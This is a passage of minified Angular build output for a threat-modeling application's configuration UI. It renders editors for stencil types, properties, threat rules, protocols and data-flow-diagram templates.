new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencil-type-template"]],inputs:{selectedTypeTemplate:"selectedTypeTemplate"},decls:1,vars:1,consts:[[4,"ngIf"],["color","primary",3,"disabled","ngModel","ngModelChange"],["appearance","fill",2,"margin-top","15px","width","100%"],["multiple","",3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],[4,"ngFor","ngForOf"],[3,"value"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltip","selectedTypeTemplate.Layout[i]['name']","matTooltipShowDelay","1000",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill",1,"number-form-field",2,"margin-left","10px"],["matInput","","type","number",3,"ngModel"],["class","number-form-field","appearance","fill","style","margin-left: 10px;",4,"ngIf"]],template:function(e,i){1&e&&ne(0,but,48,27,"ng-container",0),2&e&&V("ngIf",i.selectedTypeTemplate)},dependencies:[Zi,Ri,an,Ac,Ta,Ea,oa,br,da,nn,un,Nr,yr,Xa,Pa,Xi],styles:[".number-form-field[_ngcontent-%COMP%]{width:75px}"]}),t})();const vut=["ctxMenu"];function Aut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedType.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedType.Description)}}function Tut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedTypeTemplate.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedTypeTemplate.Description)}}function Eut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedThreatMnemonic.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatMnemonic.Description)}}function Dut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",23),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                  "),m(3,"mat-icon",24),s(4,"arrow_right"),u(),s(5,"\n                  "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                  "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                  "),m(14,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,9,e.DisplayName)),C(7),ke(re(8,11,e.DisplayName)),C(4),za("",e.Type,": ",re(12,13,i.GetElementPropertyValue(e)),""),C(3),at("matTooltip",re(15,15,"general.Delete"))}}function xut(t,a){1&t&&(m(0,"mat-icon",30),s(1,"update"),u())}function wut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedProperty=r)}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",24),s(4),u(),s(5,"\n                    "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                    "),ne(14,xut,2,0,"mat-icon",29),s(15,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,10,e.DisplayName)),C(4),ke(i.GetIcon(i.selectedElementType)),C(3),ct("",re(8,12,e.DisplayName)," "),C(4),za("",e.Type,": ",re(12,14,i.GetElementPropertyValue(e)),""),C(3),V("ngIf",i.IsPropOverwritten(e))}}function Iut(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,wut,16,16,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.selectedElementType.Name," ",re(6,3,"general.Properties"),""),C(3),V("ngForOf",e.selectedElementType.Properties)}}function Rut(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Sut(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function kut(t,a){if(1&t){const e=Ye();bt(0),s(1),oe(2,"translate"),m(3,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(5).selectedProperty.DefaultValue=n)}),u(),Mt()}if(2&t){const e=B(5);C(1),ct("",re(2,2,"general.DefaultValue"),": "),C(2),V("ngModel",e.selectedProperty.DefaultValue)}}function Put(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),m(4,"mat-form-field",32),s(5,"\n                    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"input",33),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                    "),ne(12,Rut,6,3,"button",34),s(13,"\n                  "),u(),s(14,"\n                  "),it(15,"br"),s(16,"\n                  "),m(17,"mat-form-field",32),s(18,"\n                    "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                    "),m(23,"mat-select",35),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                      "),ne(25,Sut,2,2,"mat-option",36),s(26,"\n                    "),u(),s(27,"\n                  "),u(),s(28,"\n                  "),it(29,"br"),s(30,"\n                  "),m(31,"mat-form-field",10),s(32,"\n                    "),m(33,"mat-label"),s(34),oe(35,"translate"),u(),s(36,"\n                    "),m(37,"input",37),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Tooltip=n)}),u(),s(38,"\n                  "),u(),s(39,"\n                  "),it(40,"br"),s(41,"\n                  "),ne(42,kut,4,4,"ng-container",9),s(43,"\n                  "),it(44,"br"),s(45),oe(46,"translate"),m(47,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Editable=n)}),u(),s(48,"\n                "),u(),s(49,"\n              "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,15,"general.PropertyName")),C(3),at("matTooltip",e.selectedProperty.DisplayName),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,17,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(9),ke(re(35,19,"general.Tooltip")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.Tooltip),C(5),V("ngIf","Check Box"==e.selectedProperty.Type),C(3),ct("\n                  ",re(46,21,"general.Editable"),": "),C(2),V("ngModel",e.selectedProperty.Editable)}}function Out(t,a){if(1&t){const e=Ye();bt(0,42),s(1,"\n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).OverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),Mt()}2&t&&(C(3),ke(re(4,1,"pages.config.overwriteProp")))}function Nut(t,a){if(1&t){const e=Ye();bt(0),s(1),m(2,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),u(),Mt()}if(2&t){const e=B(6);C(1),ct("",e.selectedProperty.DisplayName,": "),C(1),V("ngModel",e.currentPropertyOverwriting.Value)}}function Lut(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e.ID),C(1),ke(e.Name)}}function zut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",32),s(1,"\n                        "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n                        "),m(6,"mat-select",46),he("valueChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),s(7,"\n                          "),ne(8,Lut,2,2,"mat-option",36),s(9,"\n                        "),u(),s(10,"\n                      "),u()}if(2&t){const e=B(6);C(3),ke(re(4,4,"general.Protocols")),C(3),at("matTooltip",e.GetNamesOfIDs(e.GetProtocols(),e.currentPropertyOverwriting.Value)),V("value",e.currentPropertyOverwriting.Value),C(2),V("ngForOf",e.GetProtocols())}}function Wut(t,a){if(1&t){const e=Ye();bt(0,42),s(1," \n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).UnOverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                    "),m(6,"div",44),s(7,"\n                      "),ne(8,Nut,3,2,"ng-container",9),s(9,"\n                      "),ne(10,zut,11,6,"mat-form-field",45),s(11,"\n                    "),u(),s(12,"\n                  "),Mt()}if(2&t){const e=B(5);C(3),ke(re(4,3,"pages.config.removeOverwriting")),C(5),V("ngIf","Check Box"==e.selectedProperty.Type),C(2),V("ngIf","Protocol Select"==e.selectedProperty.Type)}}function Fut(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),ne(4,Out,6,3,"ng-container",41),s(5,"\n                  "),ne(6,Wut,13,5,"ng-container",41),s(7,"\n                "),u(),s(8,"\n              "),Mt()),2&t){const e=B(4);C(4),V("ngIf",!e.IsPropOverwritten(e.selectedProperty)),C(2),V("ngIf",e.IsPropOverwritten(e.selectedProperty))}}function Vut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedType.Properties))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Dut,19,17,"mat-list-item",21),s(16,"\n                "),ne(17,Iut,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),ne(23,Put,50,23,"ng-container",9),s(24,"\n              "),ne(25,Fut,9,2,"ng-container",9),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,11,"general.Properties")," "),C(2),at("matTooltip",re(11,13,"general.Add")),C(5),V("ngForOf",e.selectedType.Properties),C(2),V("ngIf",!e.selectedType.IsDefault),C(6),V("ngIf",null==e.selectedType.Properties?null:e.selectedType.Properties.includes(e.selectedProperty)),C(2),V("ngIf",!e.selectedType.IsDefault&&(null==e.selectedElementType.Properties?null:e.selectedElementType.Properties.includes(e.selectedProperty)))}}function But(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function Hut(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function Uut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)}),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),ne(8,But,4,6,"div",50),s(9,"\n                  "),ne(10,Hut,3,4,"div",50),s(11,"\n                  "),m(12,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0),C(2),at("matTooltip",re(13,9,"general.Delete"))}}function qut(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function Gut(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(5);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function jut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedThreatRule=r)}),s(1,"\n                    "),m(2,"mat-icon",24),s(3),u(),s(4,"\n                    "),m(5,"div",25),s(6),u(),s(7,"\n                    "),ne(8,qut,4,6,"div",50),s(9,"\n                    "),ne(10,Gut,3,4,"div",50),s(11,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedThreatRule===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedThreatRule===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(3),ke(i.GetIcon(i.selectedElementType)),C(3),ke(e.Name),C(2),V("ngIf",0==i.GetStencilRestrictionsCount(e)),C(2),V("ngIf",i.GetStencilRestrictionsCount(e)>0)}}function Qut(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,jut,12,9,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.selectedElementType.Name," ",re(6,3,"general.Threats"),""),C(3),V("ngForOf",e.elementTypeThreats)}}function $ut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.dropThreat(n,r.typeThreats))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddThreat())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Uut,17,11,"mat-list-item",47),s(16,"\n                "),ne(17,Qut,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),it(23,"app-threat-rule",48),s(24,"\n            "),u(),s(25,"\n          "),u(),s(26,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,13,"general.Threats")," "),C(2),at("matTooltip",re(11,15,"general.Add")),C(5),V("ngForOf",e.typeThreats),C(2),V("ngIf",!e.selectedType.IsDefault),C(6),V("node",e.selectedNode)("threatRule",e.selectedThreatRule)("canEdit",e.isTypeThreat)("canEditName",!0)}}function Kut(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",55),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),m(8,"button",26),he("click",function(){be(e);const n=B(5);return Me(n.DeleteTemplate(n.selectedType.TemplateDFD))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n                "),u()}if(2&t){const e=B(5);Ct("highlight-light",!e.theme.IsDarkMode)("highlight-dark",e.theme.IsDarkMode),at("matTooltip",e.selectedType.TemplateDFD.Name),C(6),ke(e.selectedType.TemplateDFD.Name),C(2),at("matTooltip",re(9,7,"general.Delete"))}}function Xut(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedType.TemplateDFD.Name="")}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                  "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Yut(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&V("selectedTypeTemplate",B(5).selectedType.TemplateDFD)}function Jut(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",51),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",52),he("click",function(){return be(e),Me(B(4).AddTemplateDFD())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,Kut,13,9,"mat-list-item",53),s(16,"\n              "),u(),s(17,"\n            "),u(),s(18,"\n            "),m(19,"div",22),s(20,"\n              "),m(21,"div",31),s(22,"\n                "),m(23,"mat-form-field",32),s(24,"\n                  "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n                  "),m(29,"input",54),he("ngModelChange",function(n){return be(e),Me(B(4).selectedType.TemplateDFD.Name=n)}),u(),s(30,"\n                  "),ne(31,Xut,6,3,"button",34),s(32,"\n                "),u(),s(33,"\n                "),it(34,"br"),s(35,"\n                "),ne(36,Yut,1,1,"app-stencil-type-template",8),s(37,"\n              "),u(),s(38,"\n            "),u(),s(39,"\n          "),u(),s(40,"\n        ")}if(2&t){const e=B(4);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedType.Name," ",re(9,14,"pages.config.stencils.DFDTemplate")," "),C(2),at("matTooltip",re(11,16,"general.Add")),V("disabled",!!e.selectedType.TemplateDFD),C(5),V("ngIf",e.selectedType.TemplateDFD),C(11),ke(re(27,18,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedType.TemplateDFD.Name),C(2),V("ngIf",e.selectedType.TemplateDFD.Name),C(5),V("ngIf",e.selectedType.TemplateDFD)}}function Zut(t,a){if(1&t&&(m(0,"mat-tab",13),oe(1,"translate"),s(2,"\n        "),ne(3,Jut,41,20,"ng-template",14),s(4,"\n    "),u()),2&t){const e=B(3);Kc("label","",re(1,2,"pages.config.stencils.DFDTemplate")," ",e.selectedType.TemplateDFD?"(1)":"","")}}function eht(t,a){if(1&t){const e=Ye();m(0,"mat-tab-group",12),he("selectedIndexChange",function(n){return be(e),Me(B(2).SetSelectedTabIndex(n))}),s(1,"\n    "),m(2,"mat-tab",13),oe(3,"translate"),s(4,"\n        "),ne(5,Vut,29,15,"ng-template",14),s(6,"\n    "),u(),s(7,"\n    "),m(8,"mat-tab",13),oe(9,"translate"),s(10,"\n        "),ne(11,$ut,27,17,"ng-template",14),s(12,"\n    "),u(),s(13,"\n    "),ne(14,Zut,5,4,"mat-tab",15),s(15,"\n  "),u()}if(2&t){const e=B(2);V("selectedIndex",e.GetSelectedTabIndex()),C(2),Kc("label","",re(3,6,"general.Properties")," (",null==e.selectedType||null==e.selectedType.Properties?null:e.selectedType.Properties.length,")"),C(6),Kc("label","",re(9,8,"general.Threats")," (",null==e.typeThreats?null:e.typeThreats.length,")"),C(6),V("ngIf",61==e.selectedType.ElementTypeID)}}function tht(t,a){1&t&&it(0,"app-stencil-type-template",56),2&t&&V("selectedTypeTemplate",B(2).selectedTypeTemplate)}function iht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",23),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n                  "),m(3,"mat-icon",24),s(4,"arrow_right"),u(),s(5,"\n                  "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                  "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                  "),m(14,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteProperty(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n                "),u()}if(2&t){const e=a.$implicit,i=B(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,9,e.DisplayName)),C(7),ke(re(8,11,e.DisplayName)),C(4),za("",e.Type,": ",re(12,13,i.GetElementPropertyValue(e)),""),C(3),at("matTooltip",re(15,15,"general.Delete"))}}function aht(t,a){1&t&&(m(0,"mat-icon",30),s(1,"update"),u())}function nht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",28),he("click",function(){const r=be(e).$implicit;return Me(B(5).selectedProperty=r)}),oe(1,"translate"),s(2,"\n                    "),m(3,"mat-icon",24),s(4),u(),s(5,"\n                    "),m(6,"div",25),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"div",25),s(11),oe(12,"translate"),u(),s(13,"\n                    "),ne(14,aht,2,0,"mat-icon",29),s(15,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(5);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,10,e.DisplayName)),C(4),ke(i.GetIcon(i.defaultProtocol)),C(3),ke(re(8,12,e.DisplayName)),C(4),za("",e.Type,": ",re(12,14,i.GetElementPropertyValue(e)),""),C(3),V("ngIf",i.IsPropOverwritten(e))}}function oht(t,a){if(1&t&&(bt(0),s(1,"\n                  "),it(2,"mat-divider"),s(3,"\n                  "),m(4,"div",19),s(5),oe(6,"translate"),u(),s(7,"\n                  "),ne(8,nht,16,16,"mat-list-item",27),s(9,"\n                "),Mt()),2&t){const e=B(4);C(5),za("",e.defaultProtocol.Name," ",re(6,3,"general.Properties"),""),C(3),V("ngForOf",e.defaultProtocol.Properties)}}function rht(t,a){if(1&t){const e=Ye();m(0,"button",39),he("click",function(){return be(e),Me(B(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n                      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n                    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function sht(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e)}}function cht(t,a){if(1&t){const e=Ye();bt(0),s(1),oe(2,"translate"),m(3,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(5).selectedProperty.DefaultValue=n)}),u(),Mt()}if(2&t){const e=B(5);C(1),ct("",re(2,2,"general.DefaultValue"),": "),C(2),V("ngModel",e.selectedProperty.DefaultValue)}}function lht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),m(4,"mat-form-field",32),s(5,"\n                    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n                    "),m(10,"input",57),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n                    "),ne(12,rht,6,3,"button",34),s(13,"\n                  "),u(),s(14,"\n                  "),it(15,"br"),s(16,"\n                  "),m(17,"mat-form-field",32),s(18,"\n                    "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n                    "),m(23,"mat-select",35),he("valueChange",function(n){return be(e),Me(B(4).selectedProperty.Type=n)}),s(24,"\n                      "),ne(25,sht,2,2,"mat-option",36),s(26,"\n                    "),u(),s(27,"\n                  "),u(),s(28,"\n                  "),it(29,"br"),s(30,"\n                  "),ne(31,cht,4,4,"ng-container",9),s(32,"\n                  "),it(33,"br"),s(34),oe(35,"translate"),m(36,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(4).selectedProperty.Editable=n)}),u(),s(37,"\n                "),u(),s(38,"\n              "),Mt()}if(2&t){const e=B(4);C(7),ke(re(8,11,"general.PropertyName")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedProperty.DisplayName),C(2),V("ngIf",e.selectedProperty.DisplayName),C(8),ke(re(21,13,"general.Type")),C(3),at("matTooltip",e.selectedProperty.Type),V("value",e.selectedProperty.Type),C(2),V("ngForOf",e.GetPropertyTypes()),C(6),V("ngIf","Check Box"==e.selectedProperty.Type),C(3),ct("\n                  ",re(35,15,"general.Editable"),": "),C(2),V("ngModel",e.selectedProperty.Editable)}}function dht(t,a){if(1&t){const e=Ye();bt(0,42),s(1,"\n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).OverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),Mt()}2&t&&(C(3),ke(re(4,1,"pages.config.overwriteProp")))}function mht(t,a){if(1&t){const e=Ye();bt(0),s(1),m(2,"mat-checkbox",38),he("ngModelChange",function(n){return be(e),Me(B(6).currentPropertyOverwriting.Value=n)}),u(),Mt()}if(2&t){const e=B(6);C(1),ct("",e.selectedProperty.DisplayName,": "),C(1),V("ngModel",e.currentPropertyOverwriting.Value)}}function uht(t,a){if(1&t){const e=Ye();bt(0,42),s(1," \n                    "),m(2,"button",43),he("click",function(){return be(e),Me(B(5).UnOverwriteProperty())}),s(3),oe(4,"translate"),u(),s(5,"\n                    "),m(6,"div",44),s(7,"\n                      "),ne(8,mht,3,2,"ng-container",9),s(9,"\n                    "),u(),s(10,"\n                  "),Mt()}if(2&t){const e=B(5);C(3),ke(re(4,2,"pages.config.removeOverwriting")),C(5),V("ngIf","Check Box"==e.selectedProperty.Type)}}function hht(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"div",31),s(3,"\n                  "),ne(4,dht,6,3,"ng-container",41),s(5,"\n                  "),ne(6,uht,11,4,"ng-container",41),s(7,"\n                "),u(),s(8,"\n              "),Mt()),2&t){const e=B(4);C(4),V("ngIf",!e.IsPropOverwritten(e.selectedProperty)),C(2),V("ngIf",e.IsPropOverwritten(e.selectedProperty))}}function fht(t,a){if(1&t){const e=Ye();s(0,"\n          "),m(1,"div",16),s(2,"\n            "),m(3,"div",17),s(4,"\n              "),m(5,"mat-list",18),he("cdkDropListDropped",function(n){be(e);const r=B(3);return Me(r.drop(n,r.selectedProtocol.Properties))}),s(6,"\n                "),m(7,"div",19),s(8),oe(9,"translate"),m(10,"button",20),he("click",function(){return be(e),Me(B(3).AddProperty())}),oe(11,"translate"),m(12,"mat-icon"),s(13,"add"),u()()(),s(14,"\n                "),ne(15,iht,19,17,"mat-list-item",21),s(16,"\n                "),ne(17,oht,10,5,"ng-container",9),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n            "),m(21,"div",22),s(22,"\n              "),ne(23,lht,39,17,"ng-container",9),s(24,"\n              "),ne(25,hht,9,2,"ng-container",9),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        ")}if(2&t){const e=B(3);C(5),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),C(3),za("",e.selectedProtocol.Name," ",re(9,11,"general.Properties")," "),C(2),at("matTooltip",re(11,13,"general.Add")),C(5),V("ngForOf",e.selectedProtocol.Properties),C(2),V("ngIf",!e.selectedProtocol.IsDefault),C(6),V("ngIf",null==e.selectedProtocol.Properties?null:e.selectedProtocol.Properties.includes(e.selectedProperty)),C(2),V("ngIf",!e.selectedProtocol.IsDefault&&(null==e.defaultProtocol.Properties?null:e.defaultProtocol.Properties.includes(e.selectedProperty)))}}function pht(t,a){1&t&&(m(0,"div",25),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t&&(C(1),za("",re(2,2,"properties.Restrictions"),": ",re(3,4,"pages.config.noRestrictions"),""))}function _ht(t,a){if(1&t&&(m(0,"div",25),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit,i=B(4);C(1),za("",re(2,2,"properties.Restrictions"),": ",i.GetStencilRestrictionsCount(e),"")}}function ght(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",49),he("click",function(){const r=be(e).$implicit;return Me(B(4).selectedThreatRule=r)}),s(1,"\n                  "),m(2,"mat-icon",24),s(3,"arrow_right"),u(),s(4,"\n                  "),m(5,"div",25),s(6),u(),s(7,"\n                  "),ne(8,pht,4,6,"div",50),s(9,"\n                  "),ne(10,_ht,3,4,"div",50),s(11,"\n                  "),m(12,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B(4).DeleteThreat(r))}),oe(13,"translate"),m(14,"mat-icon"),s(15,"delete"),u()(),s(16,"\n                